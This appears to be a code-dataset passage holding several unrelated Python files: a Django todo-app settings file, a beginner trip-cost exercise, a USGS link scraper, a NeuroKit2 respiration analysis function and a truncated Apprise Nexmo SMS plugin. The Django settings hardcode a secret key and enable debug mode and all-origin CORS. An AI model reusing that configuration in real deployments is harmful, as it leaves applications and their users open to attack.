'rest_framework.authtoken',
'rest_framework_json_api',
'todo',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo_django.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todo_django.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
# Development only
CORS_ORIGIN_ALLOW_ALL = True
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'PAGE_SIZE': 10,
'EXCEPTION_HANDLER': 'rest_framework_json_api.exceptions.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework_json_api.pagination.PageNumberPagination',
'DEFAULT_PARSER_CLASSES': (
'rest_framework_json_api.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework_json_api.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'rest_framework_json_api.metadata.JSONAPIMetadata',
}
#APPEND_SLASH = False
| 27.316129
| 91
| 0.709258
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'ry%8!dfeiilht!0!da0h29!y4tnnzu8qe6%79bsy4i(_nb%k(u'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'corsheaders',
'rest_framework',
'rest_framework.authtoken',
'rest_framework_json_api',
'todo',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'todo_django.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'todo_django.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
# Development only
CORS_ORIGIN_ALLOW_ALL = True
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.SessionAuthentication',
),
'PAGE_SIZE': 10,
'EXCEPTION_HANDLER': 'rest_framework_json_api.exceptions.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework_json_api.pagination.PageNumberPagination',
'DEFAULT_PARSER_CLASSES': (
'rest_framework_json_api.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_RENDERER_CLASSES': (
'rest_framework_json_api.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'rest_framework_json_api.metadata.JSONAPIMetadata',
}
#APPEND_SLASH = False
| true
| true
|
1c4239313b0fb16df0db4b986bf039eafabbb42e
| 217
|
py
|
Python
|
Pacote download/Exercicios/custo da viagem.py
|
Henrique-GM/Exercicios_de_Python
|
8cbbcaa31fc19e467576ab21ba3458d67052c40b
|
[
"Unlicense"
] | null | null | null |
Pacote download/Exercicios/custo da viagem.py
|
Henrique-GM/Exercicios_de_Python
|
8cbbcaa31fc19e467576ab21ba3458d67052c40b
|
[
"Unlicense"
] | null | null | null |
Pacote download/Exercicios/custo da viagem.py
|
Henrique-GM/Exercicios_de_Python
|
8cbbcaa31fc19e467576ab21ba3458d67052c40b
|
[
"Unlicense"
] | null | null | null |
viagem = float(input('Digite a distância da viagem em KM: '))
if viagem <= 200:
print('O valor cobrado será: {:.2f}$'.format(viagem * 0.50))
else:
print('O valor cobrado será: {:.2f}$'.format(viagem * 0.45))
| 31
| 64
| 0.631336
|
viagem = float(input('Digite a distância da viagem em KM: '))
if viagem <= 200:
print('O valor cobrado será: {:.2f}$'.format(viagem * 0.50))
else:
print('O valor cobrado será: {:.2f}$'.format(viagem * 0.45))
| true
| true
|
1c42399e0db35b1c24761a4d2384b6a7728a5989
| 588
|
py
|
Python
|
bin/get_data_urls.py
|
peterhil/ninhursag
|
582133ae51e98b2e4272d6a78794b08aed845960
|
[
"MIT"
] | 4
|
2015-05-24T20:39:54.000Z
|
2021-06-23T06:48:23.000Z
|
bin/get_data_urls.py
|
peterhil/ninhursag
|
582133ae51e98b2e4272d6a78794b08aed845960
|
[
"MIT"
] | 10
|
2021-03-23T01:11:49.000Z
|
2021-06-22T23:58:36.000Z
|
bin/get_data_urls.py
|
peterhil/ninhursag
|
582133ae51e98b2e4272d6a78794b08aed845960
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 mode: python -*-
import urllib.request
from bs4 import BeautifulSoup
url = 'https://www.usgs.gov/centers/nmic/historical-statistics-mineral-and-material-commodities-united-states'
with urllib.request.urlopen(url) as response:
page = response.read()
soup = BeautifulSoup(page, 'html.parser')
trs = soup.select('tr')
for tr in trs:
mineral = tr.select('td a[id]')
link = tr.select('td a[href*=".xlsx"]')
if mineral and link:
# print("\t".join([mineral[0].contents[0], link[0]['href']]))
print(link[0]['href'])
| 26.727273
| 110
| 0.659864
|
import urllib.request
from bs4 import BeautifulSoup
url = 'https://www.usgs.gov/centers/nmic/historical-statistics-mineral-and-material-commodities-united-states'
with urllib.request.urlopen(url) as response:
page = response.read()
soup = BeautifulSoup(page, 'html.parser')
trs = soup.select('tr')
for tr in trs:
mineral = tr.select('td a[id]')
link = tr.select('td a[href*=".xlsx"]')
if mineral and link:
print(link[0]['href'])
| true
| true
|
1c423aacb2531aad54f0c1359c050aa5b046564a
| 5,270
|
py
|
Python
|
neurokit2/rsp/rsp_eventrelated.py
|
aristotelisxs/NeuroKit
|
61c8c9b26ac7bc8ac5b666ce6cb1dfe59b1c146b
|
[
"MIT"
] | 1
|
2020-12-31T17:48:11.000Z
|
2020-12-31T17:48:11.000Z
|
neurokit2/rsp/rsp_eventrelated.py
|
aristotelisxs/NeuroKit
|
61c8c9b26ac7bc8ac5b666ce6cb1dfe59b1c146b
|
[
"MIT"
] | null | null | null |
neurokit2/rsp/rsp_eventrelated.py
|
aristotelisxs/NeuroKit
|
61c8c9b26ac7bc8ac5b666ce6cb1dfe59b1c146b
|
[
"MIT"
] | 1
|
2020-12-20T17:24:25.000Z
|
2020-12-20T17:24:25.000Z
|
# -*- coding: utf-8 -*-
from warnings import warn
import numpy as np
from ..epochs.eventrelated_utils import (
_eventrelated_addinfo,
_eventrelated_rate,
_eventrelated_sanitizeinput,
_eventrelated_sanitizeoutput,
)
from ..misc import NeuroKitWarning
def rsp_eventrelated(epochs, silent=False):
"""Performs event-related RSP analysis on epochs.
Parameters
----------
epochs : Union[dict, pd.DataFrame]
A dict containing one DataFrame per event/trial, usually obtained via `epochs_create()`,
or a DataFrame containing all epochs, usually obtained via `epochs_to_df()`.
silent : bool
If True, silence possible warnings.
Returns
-------
DataFrame
A dataframe containing the analyzed RSP features for each epoch,
with each epoch indicated by the `Label` column (if not
present, by the `Index` column). The analyzed features
consist of the following:
- *"RSP_Rate_Max"*: the maximum respiratory rate after stimulus onset.
- *"RSP_Rate_Min"*: the minimum respiratory rate after stimulus onset.
- *"RSP_Rate_Mean"*: the mean respiratory rate after stimulus onset.
- *"RSP_Rate_Max_Time"*: the time at which maximum respiratory rate occurs.
- *"RSP_Rate_Min_Time"*: the time at which minimum respiratory rate occurs.
- *"RSP_Amplitude_Max"*: the maximum respiratory amplitude after stimulus onset.
- *"RSP_Amplitude_Min"*: the minimum respiratory amplitude after stimulus onset.
- *"RSP_Amplitude_Mean"*: the mean respiratory amplitude after stimulus onset.
- *"RSP_Phase"*: indication of whether the onset of the event concurs with respiratory
inspiration (1) or expiration (0).
- *"RSP_PhaseCompletion"*: indication of the stage of the current respiration phase (0 to 1)
at the onset of the event.
See Also
--------
events_find, epochs_create, bio_process
Examples
----------
>>> import neurokit2 as nk
>>>
>>> # Example with simulated data
>>> rsp, info = nk.rsp_process(nk.rsp_simulate(duration=120))
>>> epochs = nk.epochs_create(rsp, events=[5000, 10000, 15000], epochs_start=-0.1, epochs_end=1.9)
>>>
>>> # Analyze
>>> rsp1 = nk.rsp_eventrelated(epochs)
>>> rsp1 #doctest: +SKIP
>>>
>>> # Example with real data
>>> data = nk.data("bio_eventrelated_100hz")
>>>
>>> # Process the data
>>> df, info = nk.bio_process(rsp=data["RSP"], sampling_rate=100)
>>> events = nk.events_find(data["Photosensor"], threshold_keep='below',
... event_conditions=["Negative", "Neutral", "Neutral", "Negative"])
>>> epochs = nk.epochs_create(df, events, sampling_rate=100, epochs_start=-0.1, epochs_end=2.9)
>>>
>>> # Analyze
>>> rsp2 = nk.rsp_eventrelated(epochs)
>>> rsp2 #doctest: +SKIP
"""
# Sanity checks
epochs = _eventrelated_sanitizeinput(epochs, what="rsp", silent=silent)
# Extract features and build dataframe
data = {} # Initialize an empty dict
for i in epochs.keys():
data[i] = {} # Initialize empty container
# Rate
data[i] = _eventrelated_rate(epochs[i], data[i], var="RSP_Rate")
# Amplitude
data[i] = _rsp_eventrelated_amplitude(epochs[i], data[i])
# Inspiration
data[i] = _rsp_eventrelated_inspiration(epochs[i], data[i])
# Fill with more info
data[i] = _eventrelated_addinfo(epochs[i], data[i])
df = _eventrelated_sanitizeoutput(data)
return df
# =============================================================================
# Internals
# =============================================================================
def _rsp_eventrelated_amplitude(epoch, output={}):
# Sanitize input
if "RSP_Amplitude" not in epoch:
warn(
"Input does not have an `RSP_Amplitude` column."
" Will skip all amplitude-related features.",
category=NeuroKitWarning
)
return output
# Get baseline
if np.min(epoch.index.values) <= 0:
baseline = epoch["RSP_Amplitude"][epoch.index <= 0].values
signal = epoch["RSP_Amplitude"][epoch.index > 0].values
else:
baseline = epoch["RSP_Amplitude"][np.min(epoch.index.values) : np.min(epoch.index.values)].values
signal = epoch["RSP_Amplitude"][epoch.index > np.min(epoch.index)].values
# Max / Min / Mean
output["RSP_Amplitude_Max"] = np.max(signal) - np.mean(baseline)
output["RSP_Amplitude_Min"] = np.min(signal) - np.mean(baseline)
output["RSP_Amplitude_Mean"] = np.mean(signal) - np.mean(baseline)
return output
def _rsp_eventrelated_inspiration(epoch, output={}):
# Sanitize input
if "RSP_Phase" not in epoch:
warn(
"Input does not have an `RSP_Phase` column."
" Will not indicate whether event onset concurs with inspiration.",
category=NeuroKitWarning
)
return output
# Indication of inspiration
output["RSP_Phase"] = epoch["RSP_Phase"][epoch.index > 0].iloc[0]
output["RSP_Phase_Completion"] = epoch["RSP_Phase_Completion"][epoch.index > 0].iloc[0]
return output
| 35.133333
| 105
| 0.627135
|
from warnings import warn
import numpy as np
from ..epochs.eventrelated_utils import (
_eventrelated_addinfo,
_eventrelated_rate,
_eventrelated_sanitizeinput,
_eventrelated_sanitizeoutput,
)
from ..misc import NeuroKitWarning
def rsp_eventrelated(epochs, silent=False):
epochs = _eventrelated_sanitizeinput(epochs, what="rsp", silent=silent)
data = {}
for i in epochs.keys():
data[i] = {}
data[i] = _eventrelated_rate(epochs[i], data[i], var="RSP_Rate")
data[i] = _rsp_eventrelated_amplitude(epochs[i], data[i])
data[i] = _rsp_eventrelated_inspiration(epochs[i], data[i])
data[i] = _eventrelated_addinfo(epochs[i], data[i])
df = _eventrelated_sanitizeoutput(data)
return df
def _rsp_eventrelated_amplitude(epoch, output={}):
if "RSP_Amplitude" not in epoch:
warn(
"Input does not have an `RSP_Amplitude` column."
" Will skip all amplitude-related features.",
category=NeuroKitWarning
)
return output
if np.min(epoch.index.values) <= 0:
baseline = epoch["RSP_Amplitude"][epoch.index <= 0].values
signal = epoch["RSP_Amplitude"][epoch.index > 0].values
else:
baseline = epoch["RSP_Amplitude"][np.min(epoch.index.values) : np.min(epoch.index.values)].values
signal = epoch["RSP_Amplitude"][epoch.index > np.min(epoch.index)].values
output["RSP_Amplitude_Max"] = np.max(signal) - np.mean(baseline)
output["RSP_Amplitude_Min"] = np.min(signal) - np.mean(baseline)
output["RSP_Amplitude_Mean"] = np.mean(signal) - np.mean(baseline)
return output
def _rsp_eventrelated_inspiration(epoch, output={}):
if "RSP_Phase" not in epoch:
warn(
"Input does not have an `RSP_Phase` column."
" Will not indicate whether event onset concurs with inspiration.",
category=NeuroKitWarning
)
return output
output["RSP_Phase"] = epoch["RSP_Phase"][epoch.index > 0].iloc[0]
output["RSP_Phase_Completion"] = epoch["RSP_Phase_Completion"][epoch.index > 0].iloc[0]
return output
| true
| true
|
1c423aad6f7ea469c32c1c28202143fc23d66473
| 12,918
|
py
|
Python
|
apprise/plugins/NotifyNexmo.py
|
linkmauve/apprise
|
76700bfa1ddcb2812d9ed14dfa7736125bcd346e
|
[
"MIT"
] | 4,764
|
2018-02-02T18:17:06.000Z
|
2022-03-31T20:41:13.000Z
|
apprise/plugins/NotifyNexmo.py
|
linkmauve/apprise
|
76700bfa1ddcb2812d9ed14dfa7736125bcd346e
|
[
"MIT"
] | 504
|
2017-11-26T15:56:14.000Z
|
2022-03-31T22:38:49.000Z
|
apprise/plugins/NotifyNexmo.py
|
linkmauve/apprise
|
76700bfa1ddcb2812d9ed14dfa7736125bcd346e
|
[
"MIT"
] | 217
|
2018-05-22T14:29:20.000Z
|
2022-03-28T06:24:46.000Z
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2019 Chris Caron <lead2gold@gmail.com>
# All rights reserved.
#
# This code is licensed under the MIT License.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files(the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions :
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# Sign-up with https://dashboard.nexmo.com/
#
# Get your (api) key and secret here:
# - https://dashboard.nexmo.com/getting-started-guide
#
import requests
from .NotifyBase import NotifyBase
from ..URLBase import PrivacyMode
from ..common import NotifyType
from ..utils import is_phone_no
from ..utils import parse_phone_no
from ..utils import validate_regex
from ..AppriseLocale import gettext_lazy as _
class NotifyNexmo(NotifyBase):
"""
A wrapper for Nexmo Notifications
"""
# The default descriptive name associated with the Notification
service_name = 'Nexmo'
# The services URL
service_url = 'https://dashboard.nexmo.com/'
# The default protocol
secure_protocol = 'nexmo'
# A URL that takes you to the setup/help of the specific protocol
setup_url = 'https://github.com/caronc/apprise/wiki/Notify_nexmo'
# Nexmo uses the http protocol with JSON requests
notify_url = 'https://rest.nexmo.com/sms/json'
# The maximum length of the body
body_maxlen = 160
# A title can not be used for SMS Messages. Setting this to zero will
# cause any title (if defined) to get placed into the message body.
title_maxlen = 0
# Define object templates
templates = (
'{schema}://{apikey}:{secret}@{from_phone}',
'{schema}://{apikey}:{secret}@{from_phone}/{targets}',
)
# Define our template tokens
template_tokens = dict(NotifyBase.template_tokens, **{
'apikey': {
'name': _('API Key'),
'type': 'string',
'required': True,
'regex': (r'^[a-z0-9]+$', 'i'),
'private': True,
},
'secret': {
'name': _('API Secret'),
'type': 'string',
'private': True,
'required': True,
'regex': (r'^[a-z0-9]+$', 'i'),
},
'from_phone': {
'name': _('From Phone No'),
'type': 'string',
'required': True,
'regex': (r'^\+?[0-9\s)(+-]+$', 'i'),
'map_to': 'source',
},
'target_phone': {
'name': _('Target Phone No'),
'type': 'string',
'prefix': '+',
'regex': (r'^[0-9\s)(+-]+$', 'i'),
'map_to': 'targets',
},
'targets': {
'name': _('Targets'),
'type': 'list:string',
},
})
# Define our template arguments
template_args = dict(NotifyBase.template_args, **{
'to': {
'alias_of': 'targets',
},
'from': {
'alias_of': 'from_phone',
},
'key': {
'alias_of': 'apikey',
},
'secret': {
'alias_of': 'secret',
},
# Default Time To Live
# By default Nexmo attempt delivery for 72 hours, however the maximum
# effective value depends on the operator and is typically 24 - 48
# hours. We recommend this value should be kept at its default or at
# least 30 minutes.
'ttl': {
'name': _('ttl'),
'type': 'int',
'default': 900000,
'min': 20000,
'max': 604800000,
},
})
def __init__(self, apikey, secret, source, targets=None, ttl=None,
**kwargs):
"""
Initialize Nexmo Object
"""
super(NotifyNexmo, self).__init__(**kwargs)
# API Key (associated with project)
self.apikey = validate_regex(
apikey, *self.template_tokens['apikey']['regex'])
if not self.apikey:
msg = 'An invalid Nexmo API Key ' \
'({}) was specified.'.format(apikey)
self.logger.warning(msg)
raise TypeError(msg)
# API Secret (associated with project)
self.secret = validate_regex(
secret, *self.template_tokens['secret']['regex'])
if not self.secret:
msg = 'An invalid Nexmo API Secret ' \
'({}) was specified.'.format(secret)
self.logger.warning(msg)
raise TypeError(msg)
# Set our Time to Live Flag
self.ttl = self.template_args['ttl']['default']
try:
self.ttl = int(ttl)
except (ValueError, TypeError):
# Do nothing
pass
if self.ttl < self.template_args['ttl']['min'] or \
self.ttl > self.template_args['ttl']['max']:
msg = 'The Nexmo TTL specified ({}) is out of range.'\
.format(self.ttl)
self.logger.warning(msg)
raise TypeError(msg)
# The Source Phone #
self.source = source
result = is_phone_no(source)
if not result:
msg = 'The Account (From) Phone # specified ' \
'({}) is invalid.'.format(source)
self.logger.warning(msg)
raise TypeError(msg)
# Store our parsed value
self.source = result['full']
# Parse our targets
self.targets = list()
for target in parse_phone_no(targets):
# Validate targets and drop bad ones:
result = is_phone_no(target)
if not result:
self.logger.warning(
'Dropped invalid phone # '
'({}) specified.'.format(target),
)
continue
# store valid phone number
self.targets.append(result['full'])
return
def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):
"""
Perform Nexmo Notification
"""
# error tracking (used for function return)
has_error = False
# Prepare our headers
headers = {
'User-Agent': self.app_id,
'Content-Type': 'application/x-www-form-urlencoded',
}
# Prepare our payload
payload = {
'api_key': self.apikey,
'api_secret': self.secret,
'ttl': self.ttl,
'from': self.source,
'text': body,
# The to gets populated in the loop below
'to': None,
}
# Create a copy of the targets list
targets = list(self.targets)
if len(targets) == 0:
# No sources specified, use our own phone no
targets.append(self.source)
while len(targets):
# Get our target to notify
target = targets.pop(0)
# Prepare our user
payload['to'] = target
# Some Debug Logging
self.logger.debug('Nexmo POST URL: {} (cert_verify={})'.format(
self.notify_url, self.verify_certificate))
self.logger.debug('Nexmo Payload: {}' .format(payload))
# Always call throttle before any remote server i/o is made
self.throttle()
try:
r = requests.post(
self.notify_url,
data=payload,
headers=headers,
verify=self.verify_certificate,
timeout=self.request_timeout,
)
if r.status_code != requests.codes.ok:
# We had a problem
status_str = \
NotifyNexmo.http_response_code_lookup(
r.status_code)
self.logger.warning(
'Failed to send Nexmo notification to {}: '
'{}{}error={}.'.format(
target,
status_str,
', ' if status_str else '',
r.status_code))
self.logger.debug(
'Response Details:\r\n{}'.format(r.content))
# Mark our failure
has_error = True
continue
else:
self.logger.info('Sent Nexmo notification to %s.' % target)
except requests.RequestException as e:
self.logger.warning(
'A Connection error occurred sending Nexmo:%s '
'notification.' % target
)
self.logger.debug('Socket Exception: %s' % str(e))
# Mark our failure
has_error = True
continue
return not has_error
def url(self, privacy=False, *args, **kwargs):
"""
Returns the URL built dynamically based on specified arguments.
"""
# Define any URL parameters
params = {
'ttl': str(self.ttl),
}
# Extend our parameters
params.update(self.url_parameters(privacy=privacy, *args, **kwargs))
return '{schema}://{key}:{secret}@{source}/{targets}/?{params}'.format(
schema=self.secure_protocol,
key=self.pprint(self.apikey, privacy, safe=''),
secret=self.pprint(
self.secret, privacy, mode=PrivacyMode.Secret, safe=''),
source=NotifyNexmo.quote(self.source, safe=''),
targets='/'.join(
[NotifyNexmo.quote(x, safe='') for x in self.targets]),
params=NotifyNexmo.urlencode(params))
@staticmethod
def parse_url(url):
"""
Parses the URL and returns enough arguments that can allow
us to re-instantiate this object.
"""
results = NotifyBase.parse_url(url, verify_host=False)
if not results:
# We're done early as we couldn't load the results
return results
# Get our entries; split_path() looks after unquoting content for us
# by default
results['targets'] = NotifyNexmo.split_path(results['fullpath'])
# The hostname is our source number
results['source'] = NotifyNexmo.unquote(results['host'])
# Get our account_side and auth_token from the user/pass config
results['apikey'] = NotifyNexmo.unquote(results['user'])
results['secret'] = NotifyNexmo.unquote(results['password'])
# API Key
if 'key' in results['qsd'] and len(results['qsd']['key']):
# Extract the API Key from an argument
results['apikey'] = \
NotifyNexmo.unquote(results['qsd']['key'])
# API Secret
if 'secret' in results['qsd'] and len(results['qsd']['secret']):
# Extract the API Secret from an argument
results['secret'] = \
NotifyNexmo.unquote(results['qsd']['secret'])
# Support the 'from' and 'source' variable so that we can support
# targets this way too.
# The 'from' makes it easier to use yaml configuration
if 'from' in results['qsd'] and len(results['qsd']['from']):
results['source'] = \
NotifyNexmo.unquote(results['qsd']['from'])
if 'source' in results['qsd'] and len(results['qsd']['source']):
results['source'] = \
NotifyNexmo.unquote(results['qsd']['source'])
# Support the 'ttl' variable
if 'ttl' in results['qsd'] and len(results['qsd']['ttl']):
results['ttl'] = \
NotifyNexmo.unquote(results['qsd']['ttl'])
# Support the 'to' variable so that we can support rooms this way too
# The 'to' makes it easier to use yaml configuration
if 'to' in results['qsd'] and len(results['qsd']['to']):
results['targets'] += \
NotifyNexmo.parse_phone_no(results['qsd']['to'])
return results
| 33.466321
| 79
| 0.542963
|
import requests
from .NotifyBase import NotifyBase
from ..URLBase import PrivacyMode
from ..common import NotifyType
from ..utils import is_phone_no
from ..utils import parse_phone_no
from ..utils import validate_regex
from ..AppriseLocale import gettext_lazy as _
class NotifyNexmo(NotifyBase):
service_name = 'Nexmo'
service_url = 'https://dashboard.nexmo.com/'
secure_protocol = 'nexmo'
setup_url = 'https://github.com/caronc/apprise/wiki/Notify_nexmo'
notify_url = 'https://rest.nexmo.com/sms/json'
body_maxlen = 160
title_maxlen = 0
templates = (
'{schema}://{apikey}:{secret}@{from_phone}',
'{schema}://{apikey}:{secret}@{from_phone}/{targets}',
)
template_tokens = dict(NotifyBase.template_tokens, **{
'apikey': {
'name': _('API Key'),
'type': 'string',
'required': True,
'regex': (r'^[a-z0-9]+$', 'i'),
'private': True,
},
'secret': {
'name': _('API Secret'),
'type': 'string',
'private': True,
'required': True,
'regex': (r'^[a-z0-9]+$', 'i'),
},
'from_phone': {
'name': _('From Phone No'),
'type': 'string',
'required': True,
'regex': (r'^\+?[0-9\s)(+-]+$', 'i'),
'map_to': 'source',
},
'target_phone': {
'name': _('Target Phone No'),
'type': 'string',
'prefix': '+',
'regex': (r'^[0-9\s)(+-]+$', 'i'),
'map_to': 'targets',
},
'targets': {
'name': _('Targets'),
'type': 'list:string',
},
})
template_args = dict(NotifyBase.template_args, **{
'to': {
'alias_of': 'targets',
},
'from': {
'alias_of': 'from_phone',
},
'key': {
'alias_of': 'apikey',
},
'secret': {
'alias_of': 'secret',
},
'ttl': {
'name': _('ttl'),
'type': 'int',
'default': 900000,
'min': 20000,
'max': 604800000,
},
})
def __init__(self, apikey, secret, source, targets=None, ttl=None,
**kwargs):
super(NotifyNexmo, self).__init__(**kwargs)
self.apikey = validate_regex(
apikey, *self.template_tokens['apikey']['regex'])
if not self.apikey:
msg = 'An invalid Nexmo API Key ' \
'({}) was specified.'.format(apikey)
self.logger.warning(msg)
raise TypeError(msg)
self.secret = validate_regex(
secret, *self.template_tokens['secret']['regex'])
if not self.secret:
msg = 'An invalid Nexmo API Secret ' \
'({}) was specified.'.format(secret)
self.logger.warning(msg)
raise TypeError(msg)
self.ttl = self.template_args['ttl']['default']
try:
self.ttl = int(ttl)
except (ValueError, TypeError):
pass
if self.ttl < self.template_args['ttl']['min'] or \
self.ttl > self.template_args['ttl']['max']:
msg = 'The Nexmo TTL specified ({}) is out of range.'\
.format(self.ttl)
self.logger.warning(msg)
raise TypeError(msg)
self.source = source
result = is_phone_no(source)
if not result:
msg = 'The Account (From) Phone # specified ' \
'({}) is invalid.'.format(source)
self.logger.warning(msg)
raise TypeError(msg)
self.source = result['full']
self.targets = list()
for target in parse_phone_no(targets):
result = is_phone_no(target)
if not result:
self.logger.warning(
'Dropped invalid phone # '
'({}) specified.'.format(target),
)
continue
self.targets.append(result['full'])
return
def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs):
has_error = False
headers = {
'User-Agent': self.app_id,
'Content-Type': 'application/x-www-form-urlencoded',
}
payload = {
'api_key': self.apikey,
'api_secret': self.secret,
'ttl': self.ttl,
'from': self.source,
'text': body,
'to': None,
}
targets = list(self.targets)
if len(targets) == 0:
targets.append(self.source)
while len(targets):
target = targets.pop(0)
payload['to'] = target
self.logger.debug('Nexmo POST URL: {} (cert_verify={})'.format(
self.notify_url, self.verify_certificate))
self.logger.debug('Nexmo Payload: {}' .format(payload))
self.throttle()
try:
r = requests.post(
self.notify_url,
data=payload,
headers=headers,
verify=self.verify_certificate,
timeout=self.request_timeout,
)
if r.status_code != requests.codes.ok:
status_str = \
NotifyNexmo.http_response_code_lookup(
r.status_code)
self.logger.warning(
'Failed to send Nexmo notification to {}: '
'{}{}error={}.'.format(
target,
status_str,
', ' if status_str else '',
r.status_code))
self.logger.debug(
'Response Details:\r\n{}'.format(r.content))
has_error = True
continue
else:
self.logger.info('Sent Nexmo notification to %s.' % target)
except requests.RequestException as e:
self.logger.warning(
'A Connection error occurred sending Nexmo:%s '
'notification.' % target
)
self.logger.debug('Socket Exception: %s' % str(e))
has_error = True
continue
return not has_error
def url(self, privacy=False, *args, **kwargs):
params = {
'ttl': str(self.ttl),
}
params.update(self.url_parameters(privacy=privacy, *args, **kwargs))
return '{schema}://{key}:{secret}@{source}/{targets}/?{params}'.format(
schema=self.secure_protocol,
key=self.pprint(self.apikey, privacy, safe=''),
secret=self.pprint(
self.secret, privacy, mode=PrivacyMode.Secret, safe=''),
source=NotifyNexmo.quote(self.source, safe=''),
targets='/'.join(
[NotifyNexmo.quote(x, safe='') for x in self.targets]),
params=NotifyNexmo.urlencode(params))
@staticmethod
def parse_url(url):
results = NotifyBase.parse_url(url, verify_host=False)
if not results:
return results
results['targets'] = NotifyNexmo.split_path(results['fullpath'])
results['source'] = NotifyNexmo.unquote(results['host'])
